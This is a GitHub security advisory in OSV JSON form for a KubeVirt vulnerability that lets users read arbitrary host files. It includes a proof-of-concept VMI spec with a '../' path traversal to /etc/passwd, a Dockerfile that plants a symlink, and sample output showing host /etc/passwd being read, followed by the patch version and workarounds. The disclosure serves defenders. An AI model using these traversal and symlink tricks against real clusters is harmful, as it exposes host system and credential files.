{ "schema_version": "1.4.0", "id": "GHSA-qv98-3369-g364", "modified": "2022-09-15T03:20:35Z", "published": "2022-09-15T03:20:35Z", "aliases": [], "summary": "KubeVirt vulnerable to arbitrary file read on host", "details": "### Impact\n\nUsers with the permission to create VMIs can construct VMI specs which allow them to read arbitrary files on the host. There are three main attack vectors:\n\n1. Some path fields on the VMI spec were not properly validated and allowed passing in relative paths which would have been mounted into the virt-launcher pod. The fields are: `spec.domain.firmware.kernelBoot.container.kernelPath`, `spec.domain.firmware.kernelBoot.container.initrdPath` as well as `spec.volumes[*].containerDisk.path`.\n\nExample:\n\n```yaml\napiVersion: [kubevirt.io/v1](http://kubevirt.io/v1)\nkind: VirtualMachineInstance\nmetadata:\n name: vmi-fedora\nspec:\n domain:\n devices:\n disks:\n - disk:\n bus: virtio\n name: containerdisk\n - disk:\n bus: virtio\n name: cloudinitdisk\n - disk:\n bus: virtio\n name: containerdisk1\n rng: {}\n resources:\n requests:\n memory: 1024M\n terminationGracePeriodSeconds: 0\n volumes:\n - containerDisk:\n image: [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](http://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0)\n name: containerdisk\n - containerDisk:\n image: [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](http://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0)\n path: test3/../../../../../../../../etc/passwd\n name: containerdisk1\n - cloudInitNoCloud:\n userData: |\n #!/bin/sh\n echo 'just something to make cirros happy'\n name: cloudinitdisk\n```\n\n2. Instead of passing in relative links on the API, using malicious links in the containerDisk itself can have the same effect:\n\n```Dockerfile\nFROM \nRUN mkdir -p /etc/ && touch /etc/passwd\nRUN mkdir -p /disks/ && ln -s /etc/passwd /disks/disk.img\n```\n\n3. KubeVirt allows PVC hotplugging. The hotplugged PVC is under user-control and it is possible to place absolute links there. Since containerDisk and hotplug code use the same mechanism to provide the disk to the virt-launcher pod, it can be used too to do arbitrary host file reads.\n\nIn all three cases it is then possible to at lest read any host file:\n\n```\n$ sudo cat /dev/vdc\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n[...]\n```\n\n\n### Patches\n\nKubeVirt 0.55.1 provides patches to fix the vulnerability.\n\n\n### Workarounds\n\n* Ensure that the `HotplugVolumes` feature-gate is disabled\n* ContainerDisk support can't be disabled. The only known way to mitigate this issue is create with e.g. policy controller a conditiontemplate which ensures that no containerDisk gets added and that `spec.domain.firmware.kernelBoot` is not used on VirtualMachineInstances.|\n* Ensure that SELinux is enabled. It blocks most attempts to read host files but does not provide a 100% guarantee (like vm-to-vm read may still work).\n\n### References\n\n\nDisclosure notice form the discovering party: https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm\n\n### For more information\n\nFor interested vendors which have to provide a fix for their supported versions, the following PRs are providing the fix:\n\n * https://github.com/kubevirt/kubevirt/pull/8198\n * https://github.com/kubevirt/kubevirt/pull/8268\n \n### Credits\nOliver Brooks and James Klopchic of NCC Group\nDiane Dubois and Roman Mohr of Google\n", "severity": [], "affected": [ { "package": { "ecosystem": "Go", "name": "kubevirt.io/kubevirt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.20.0" }, { "fixed": "0.55.1" } ] } ] } ], "references": [ { "type": "WEB", "url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm" }, { "type": "WEB", "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" }, { "type": "WEB", "url": "https://github.com/kubevirt/kubevirt/pull/8198" }, { "type": "WEB", "url": "https://github.com/kubevirt/kubevirt/pull/8268" }, { "type": "PACKAGE", "url": "https://github.com/kubevirt/kubevirt" } ], "database_specific": { "cwe_ids": [], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2022-09-15T03:20:35Z", "nvd_published_at": null } }